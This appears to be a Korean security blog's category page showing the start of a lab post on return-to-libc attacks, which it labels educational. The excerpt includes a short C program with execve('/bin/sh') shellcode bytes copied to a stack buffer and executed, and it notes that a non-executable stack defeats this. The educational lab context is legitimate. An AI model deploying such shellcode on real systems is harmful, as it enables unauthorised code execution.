일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 운영체제
- dtft
- 유니티
- Security
- stride
- 게임 개발
- 메카님
- Rr
- Unity #Indie Game
- CTF
- DP
- 언리얼엔진
- MAC
- sampling theory
- linear difference equation
- Race condition
- STCF
- DSP
- Double free
- 유스케이스
- TSet
- RBAC
- 배경 그림
- AINCAA
- pdlc
- frequency-domain spectrum analysis
- dirty cow
- MLFQ
- ret2libc
- 게임개발
Archives
- Today
- Total
목록stack based buffer overflow (1)
다양한 기록
Return-to-libc Attacks (Ret2Libc) / 실습
* 교육용입니다 / 방어기법 다 해제하고 진행한 거라 현대의 실제 환경에서는 불가능합니다*const char code[] = "\x31\xc0\x50\x68//sh\x68\bin" "\x89\xe3\x50\x53\x89\xe1\x99" "\xb0\x0b\xcd\x80";int main(int argc, char **argv){ char buffer[sizeof(code)]; strcpy(buffer, code); ((void(*)( ))buffer)();}* const 붙어 있어서 전역 변수로 선언되어도 텍스트 영역에 존재함어쨌든 저대로 실행해도 실행 인됨.. => Non-executable Stack 때문 (버퍼는 스택에 있음) gcc -z noexecstack ..
운영체제보안
2024. 12. 5. 18:53